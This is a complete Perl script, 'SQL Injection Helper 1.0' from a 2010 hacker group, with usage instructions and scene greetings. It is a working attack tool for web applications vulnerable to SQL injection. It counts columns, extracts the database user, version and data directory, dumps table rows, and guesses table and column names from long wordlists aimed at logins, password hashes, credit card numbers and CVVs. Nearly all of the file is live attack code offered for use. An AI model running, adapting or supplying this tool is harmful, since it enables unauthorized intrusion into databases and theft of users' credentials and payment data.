Code:
#!/usr/bin/perl
#-------------------------------------------------------------------#
# _ ___ _ ____
# (_)/ _ \| | |___ \
# _| | | | | __ __) |
# | | | | | |/ /|__ <
# | | |_| | < ___) |
# | |\___/|_|\_\____/
# _/ |
# |__/ SQL Injection Helper 1.0
#
#................................................................
#
# + written by fred777
# + (C) 2010 by j0k3 project
# + fred777.5x.to
#
# ...............................................................
# DAMN INFORMATION SHIT
#
# + Column Counter
# + SQL Data Grabber
# + Name Information Fuzzer
#
# - Column Counter
# - $ perl sql.pl -c <page> <true-word>
# - $ perl sql.pl -c http://seite.de/?d=1 j0k3
#
# - SQL Data Grabber
# - $ perl sql.pl -d <page>
# - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,j0k3
# - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,
# j0k3(table_name1,name2)+from+table
#
# - Name Information Fuzzer
# - $ perl sql.pl -f <page>
# - $ perl sqlp.pl -f http://seite.de/?d=-1+union+select+1,j0k3
#
# ...............................................................
# DAMN GREETZ
#
# + back2hack, free-hack, creative-coding, scene-coderz, hackbase
# + darkc0de for the n1 table list
# + and teh leet happy ninjas of course :P
#
#-------------------------------------------------------------------#
use strict;
use warnings;
use LWP::UserAgent;
print q
{
+-------------------------------------------------------------+
| SQL Injection Helper 1.0 |
| |
| + Column Counter |
| + SQL Data Grabber |
| + Name Information-Fuzzer |
| |
| < j0k3 > (C) by fred777 |
+-------------------------------------------------------------+
}; $|++;
our ($op,$url,$true) = @ARGV;
our ($file,$lim) = ('log.txt',1000);
our $ua = LWP::UserAgent->new();
my $head =
"+-------------------------------------------------------------+\n".
"| j0k3 SQL Injection Helper - Logfile |\n".
"+-------------------------------------------------------------+\n";
usage() unless $op =~ m:^-d$|^-c$|^-f$:i;
usage() unless $url =~ m.^http://.;
writing($head);
order() if($op eq '-c');
selects() if($op eq '-d');
fuzz() if($op eq '-f');
sub order {
error() if(!$true);
my ($resp,$i,$str) = (0,0,"$url+AND+1=0+UNION+SELECT+1");
do {
$i++;
$resp = $ua->get("$url+ORDER+BY+$i--+") or die "\n$!\n";
} while($resp->content =~ m:$true:i);
$str .= ",$_" for (2..$i-1);
printf("\nColumns: %d\nString: %s\n",$i-1,"$str--+");
writing("\nColumns:".($i-1)."\nString: $str--+\n\n");
}
sub selects {
if($url =~ m:.+j0k3: && $url !~ m:.+from.+:) {
my $inf = 'UNHEX(HEX(CONCAT_WS(0x3a,99999,user(),version(),@@datadir,99999)))';
my $st = replace($url,'j0k3',$inf);
my $resp = $ua->get("$st--+") or die "\n$!\n";
$resp->content =~ m![9]{5}:(.+):(.+):(.+):[9]{5}!i;
my $t = "\nUrl: $url\n\nUser: $1\nMySQL Version: $2\nDirectory: $3\n\n";
print $t; writing($t);
}
elsif($url =~ m:.+from.+:i) {
my ($c,$resp) = (0,0);
$url =~ m:j0k3\((.+)\):i;
my $str = "UNHEX(HEX(CONCAT_WS(0x3a,99999,$1,99999)))";
my $st = replace($url,'j0k3\('.$1.'\)',$str);
print "\nDumping Information:\n\n"; writing("\nUrl: $st\n\nDumping Information:\n\n");
do {
$resp = $ua->get("$st+LIMIT+$c,$lim--+") or die "\n$!\n";
$resp->content =~ m![9]{5}:(.*):[9]{5}!;
print "[$c] $1\n"; writing("[$c] $1\n");
$c++;
} while($resp->content =~ m![9]{5}:(.+):[9]{5}! && $resp->content !~ m:error:i);
}
else {
error();
}
}
sub fuzz {
my @tables =(
'user','admin','users','admins','account','accounts','adm','admin_login',
'member','memberlist','members','login_admin','login_admins','login_user',
'login_users','logins','logon','logs','admin_user','admin_userinfo','administer',
'administrable','administrate','administration','administrator','administrators',
'adminrights','adminuser','login','mambo_session','mambo_users','manage','Logins',
'manager','mb_users','mybb_users','e107.e107_user','e107_user','Admins','Login',
'phorum_users','phpads_clients','phpads_config','phpbb_users','phpBB2.forum_users',
'tbladmins','sort','_wfspro_admin','4images_users','a_admin','art','article_admin',
'articles','artikel','aut','author','autore','backend','backend_users','backenduser',
'chat_config','chat_messages','chat_users','client','clients','clubconfig',
'company','config','contact','contacts','content', 'control','cpg_config',
'cpg132_users','customer','customers','customers_basket','dbadmins','dealer',
'dealers','diary','download','forum.ibf_members','fusion_user_groups',
'fusion_users','group','groups','ibf_admin_sessions','ibf_conf_settings',
'ibf_members','ibf_members_converge','ibf_sessions','icq','images','index',
'info','ipb.ibf_members','ipb_sessions','joomla_users','jos_blastchatc_users',
'jos_comprofiler_members','jos_contact_details','jos_joomblog_users',
'jos_messages_cfg','jos_moschat_users','jos_users','knews_lostpass','korisnici',
'kpro_adminlogs','kpro_user','links','lost_pass','lost_passwords','movie','movies',
'lostpass','lostpasswords','m_admin','main','minibbtable_users','mitglieder',
'mysql','mysql.user','name','names','news','news_lostpass','newsletter',
'nuke_authors','nuke_bbconfig','nuke_config','nuke_popsettings','nuke_users',
'obb_profiles','order','orders','parol','partner','partners','passes','password',
'passwords','perdorues','perdoruesit','phorum_session','phorum_user',
'phpBB2.phpbb_users','phpmyadmin.pma_table_info','pma_table_info','poll_user',
'punbb_users','pwd','pwds','reg_user','reg_users','registered','reguser','regusers',
'session','sessions','settings','shop.cards','shop.orders','site_login',
'site_logins','sitelogin','sitelogins','sites','smallnuke_members','smf_members',
'SS_orders','statistics','superuser','sysadmin','sysadmins','system','sysuser',
'sysusers','table','tables','tb_admin','tb_administrator','tb_login','tb_member',
'tb_members','tb_user','tb_username','tb_usernames','tb_users','tbl','tbl_user',
'tbl_users','tbluser','tbl_clients','tbl_client','tblclients','tblclient','test',
'usebb_members','user_admin','user_info','user_list','user_login','user_logins',
'user_names','usercontrol','userinfo','userlist','userlogins','username','usernames',
'userrights','users','vb_user','vbulletin_session','vbulletin_user','voodoo_members',
'webadmin','webadmins','webmaster','webmasters','webuser','webusers','x_admin',
'xoops_bannerclient','xoops_users','yabb_settings','yabbse_settings','ActiveDataFeed',
'Category','CategoryGroup','ChicksPass','ClickTrack','Country','CountryCodes1',
'DataFeedShowtag1','DataFeedShowtag2','DataFeedShowtag2_incoming','dtproperties',
'Event','Event_backup','Event_Category','EventRedirect','Events_new','Genre',
'JamPass','MyTicketek','MyTicketekArchive','News','Promotion','Region',
'SearchOptions','Series','Sheldonshows','StateList','States','SubCategory',
'Subjects','Survey','SurveyAnswer','SurveyAnswerOpen','SurveyQuestion','SurveyRespondent',
'sysconstraints','syssegments','tblRestrictedPasswords','tblRestrictedShows',
'Ticket System Acc Numbers','TimeDiff','Titles','Total Members','UserPreferences',
'uvw_Category','uvw_Preferences','Venue','venues','VenuesNew','stone list',
'tblArtistCategory','tblArtists','tblConfigs','tblLayouts','tblLogBookAuthor',
'tblLogBookImages','tblLogBookImport','tblLogBookUser','tblMails','tblNewCategory',
'tblNews','tblOrders','tblStoneCategory','tblStones','tblUser','tblWishList',
'viewLogBookEntry','viewStoneArtist','vwListAllAvailable','CC_info',
'CC_username','cms_user','cms_users','cms_admin','cms_admins','user_name',
'jos_user','table_user','email','mail','bulletin','cc_info','login_name',
'admuserinfo','userlistuser_list','SiteLogin','Site_Login','UserAdmin',
);
my @columns = (
'user','name','username','password','passwd','pass','benutzername','passwort',
'cc_number','id','email','pwd','user_name','customers_email_address',
'customers_password','user_password','user_pass','admin_user','admin_password',
'admin_pass','usern','user_n','username1','password1','email1','id1',
'users','login','logins','login_user','login_admin','login_username','user_username',
'user_login','auid','apwd','adminid','admin_id','adminuser','adminuserid',
'admin_userid','adminusername','admin_username','adminname','admin_name',
'usr','usr_n','usrname','usr_name','usrpass','usr_pass','usrnam','nc','uid',
'userid','user_id','myusername','mail','emni','logohu','punonjes','kpro_user',
'wp_users','emniplote','perdoruesi','perdorimi','punetoret','logini','llogaria',
'kodi','emer','ime','korisnik','korisnici','user1','administrator','text',
'administrator_name','mem_login','login_password','login_pass','login_passwd',
'login_pwd','sifra','lozinka','psw','pass1word','pass_word','passw','pass_w',
'user_passwd','userpass','userpassword','userpwd','user_pwd','useradmin',
'user_admin','mypassword','passwrd','admin_pwd','admin_passwd','mem_password',
'memlogin','e_mail','usrn','u_name','uname','mempassword','mem_pass',
'mem_passwd','mem_pwd','p_word','pword','p_assword','myname','my_username',
'my_name','my_password','my_email','cvvnumber','about','access','accnt',
'accnts','account','accounts','admin','adminemail','adminlogin','adminmail',
'admins','aid','aim','auth','authenticate','authentication','blog','cc_expires',
'cc_owner','cc_type','cfg','cid','clientname','clientpassword','clientusername',
'conf','config','contact','converge_pass_hash','converge_pass_salt','crack',
'customer','customers','cvvnumber]','data','db_database_name','db_hostname',
'db_password','db_username','download','e-mail','emailaddress','full','gid',
'group','group_name','hash','hashsalt','homepage','icq','icq_number','id_group',
'id_member','images','index','ip_address','last_ip','last_login','lastname',
'log','login_name','login_pw','loginkey','loginout','logo','md5hash','member',
'member_id','member_login_key','member_name','memberid','membername','members',
'new','news','nick','number','nummer','pass_hash','passwordsalt','passwort',
'personal_key','phone','privacy','pw','pwrd','salt','search','secretanswer',
'secretquestion','serial','session_member_id','session_member_login_key','sesskey',
'setting','sid','spacer','status','store','store1','store2','store3','store4',
'table_prefix','temp_pass','temp_password','temppass','temppasword','text','un',
'user_email','user_icq','user_ip','user_level','user_passw','user_pw','user_pword',
'user_pwrd','user_un','user_uname','user_usernm','user_usernun','user_usrnm',
'userip','userlogin','usernm','userpw','usr2','usrnm','usrs','warez','xar_name',
'xar_pass');
print "\nUrl: $url\n"; writing("\nUrl: $url\n");
print "\nScanning Tables:\n"; writing("\nScanning Tables:\n");
foreach my $tab (@tables) {
my $re = replace($url,'j0k3',9x5);
my $resp = $ua->get("$re+FROM+$tab--+");
if($resp->content =~ m:[^,][9]{5}: && $resp->content !~ m:error:i) {
print "+ $tab -> Scanning Columns:\n";
writing("+ $tab -> Scanning Columns:\n");
foreach my $col (@columns) {
$re = replace($url,'j0k3',"CONCAT(99999,0x3a,$col)");
$resp = $ua->get("$re+FROM+$tab+LIMIT+0,1--+");
if($resp->content =~ m:[^(][9]{5}: && $resp->content !~ m:error:i) {
print "- $col\n"; writing("- $col\n");
}
}
}
}
}
sub replace {
my ($str,$or,$re) = @_;
$str =~ s/$or/$re/;
return $str;
}
sub writing {
my $text = shift;
open FL,">>$file" or die "\n$!\n";
print FL $text;
close FL;
}
sub error {
print "+-------------------------------------------------------------+\n".
"| Error: Read Usage! - \$ perl sql.pl |\n".
"+-------------------------------------------------------------+\n"; exit;
}
sub usage {
print q {
+-------------------------------------------------------------+
| INFORMATION |
+-------------------------------------------------------------+
| |
| Column Counter: |
| $ perl sql.pl -c <url> <true-word> |
| $ perl sql.pl -c http://seite.de/?id=7 j0k3 |
| |
| SQL Data Grabber: |
| $ perl sql.pl -d <url> |
| $ perl sql.pl -d http://seite.de/?id=-7+union+select |
| +1,j0k3 |
| $ perl sql.pl -d http://seite.de/?id=-7+union+select+1, |
| j0ke(column1,column2)+from+table |
| |
| Name Information Fuzzer: |
| $perl sql.pl -f <url> |
| $perl sql.pl -f http://seite.de/?id=-7+union+select |
| +1,j0k3 |
| |
| < j0k3 > |
+-------------------------------------------------------------+
}; exit;
}
# EOF - < j0k3 > - > 06.2010 - version 1.0